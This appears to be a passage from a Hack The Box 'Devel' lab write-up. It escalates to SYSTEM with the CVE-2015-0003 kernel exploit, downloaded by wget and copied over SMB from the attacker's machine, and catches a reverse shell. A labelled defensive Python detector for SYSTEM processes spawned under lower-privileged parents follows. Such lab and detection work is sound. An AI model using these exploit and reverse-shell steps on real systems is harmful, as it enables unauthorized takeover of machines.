CVE-2015-0003 (MS15-010)


It certainly matches the target operating system.

I found this exploit online.

┌──(kali㉿kali)-[~/…/htb/labs/devel/kernelbuster]
└─$ wget https://github.com/Ascotbe/Kernelhub/raw/master/CVE-2015-0003/CVE-2015-0003_x86.exe

I downloaded the file via wget.

c:\tmp>copy \\10.10.14.6\smb\CVE-2015-0003_x86.exe
copy \\10.10.14.6\smb\CVE-2015-0003_x86.exe
        1 file(s) copied.

Transport over SMB

c:\tmp>CVE-2015-0003_x86.exe
CVE-2015-0003_x86.exe
HT Windows Font Exploit modify by skyer
usage: exp.exe "net user t00ls t00ls /ad"

The instructions seem easy enough.

c:\tmp>CVE-2015-0003_x86.exe "C:\tmp\pe.exe"
cve-2015-0003_x86.exe "c:\tmp\pe.exe"

I supplied the payload as the command.

┌──(kali㉿kali)-[~/archive/htb/labs/devel]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.5] 49162
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
c:\tmp>whoami
whoami
nt authority\system
 
c:\tmp>hostname
hostname
devel
 
c:\tmp>ipconfig
ipconfig
 
Windows IP Configuration
 
 
ethernet adapter local area connection 3:
 
   connection-specific dns suffix  . : 
   ipv6 address. . . . . . . . . . . : dead:beef::58c0:f1cf:abc6:bb9e
   temporary ipv6 address. . . . . . : dead:beef::f1e5:9b02:27b6:d459
   link-local ipv6 address . . . . . : fe80::58c0:f1cf:abc6:bb9e%15
   ipv4 address. . . . . . . . . . . : 10.10.10.5
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%15
                                       10.10.10.2
 
tunnel adapter isatap.{c57f02f8-df4f-40ee-bc21-a206b3f501e4}:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . : 
 
tunnel adapter local area connection* 9:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . : 

System Level Compromise
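As an added, defender-side example that is not part of the original writeup: the escalation above shows a user-context process (the exploit binary) starting its payload as NT AUTHORITY\SYSTEM, which in process-creation telemetry (Sysmon Event ID 1 or Security 4688) appears as a child whose account is SYSTEM while its parent's account was not. The script below runs that check over constructed Sysmon-style records; the PIDs, the DEVEL\webuser account and the process tree are assumptions, not data from the box.

```python
"""Flag processes created as SYSTEM under a parent that was created as another account.

Telemetry records the account a process started under. A user-context exploit that
swaps its own token keeps its original account in the log, so the SYSTEM child it
spawns stands out as a parent/child account mismatch.
"""
from typing import Dict, List, Set

SYSTEM = r"NT AUTHORITY\SYSTEM"

# Site-specific parents known to start SYSTEM children from a lower-privileged
# context (lower-cased image paths). Assumption: none by default.
KNOWN_ELEVATION_PARENTS: Set[str] = set()

# Constructed sample events, not real telemetry from the box. Fields mirror the
# subset of Sysmon Event ID 1 used here. DEVEL\webuser is a placeholder account.
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 400,  "ppid": 4,    "user": SYSTEM,           "image": r"C:\Windows\System32\services.exe"},
    {"pid": 712,  "ppid": 400,  "user": SYSTEM,           "image": r"C:\Windows\System32\svchost.exe"},
    {"pid": 1500, "ppid": 712,  "user": r"DEVEL\webuser", "image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 1688, "ppid": 1500, "user": r"DEVEL\webuser", "image": r"C:\tmp\CVE-2015-0003_x86.exe"},
    {"pid": 1720, "ppid": 1688, "user": SYSTEM,           "image": r"C:\tmp\pe.exe"},
    {"pid": 1744, "ppid": 1720, "user": SYSTEM,           "image": r"C:\Windows\System32\cmd.exe"},
]


def find_privilege_jumps(events: List[Dict]) -> List[Dict]:
    """Return SYSTEM children whose recorded parent was not created as SYSTEM."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for child in events:
        parent = by_pid.get(child["ppid"])
        # Skip roots we have no record for, non-SYSTEM children and SYSTEM-to-SYSTEM lineage.
        if parent is None or child["user"] != SYSTEM or parent["user"] == SYSTEM:
            continue
        if parent["image"].lower() in KNOWN_ELEVATION_PARENTS:
            continue
        hits.append({
            "child": child["image"],
            "parent": parent["image"],
            "parent_user": parent["user"],
            # A parent image outside the Windows directory is the stronger signal.
            "parent_outside_windows": not parent["image"].lower().startswith("c:\\windows\\"),
        })
    return hits


if __name__ == "__main__":
    for hit in find_privilege_jumps(SAMPLE_EVENTS):
        print(hit)
```

The check trusts the recorded parent PID, so it is one signal to correlate with others (file written to a user-writable path such as C:\tmp, outbound connection from the SYSTEM child) rather than a standalone verdict.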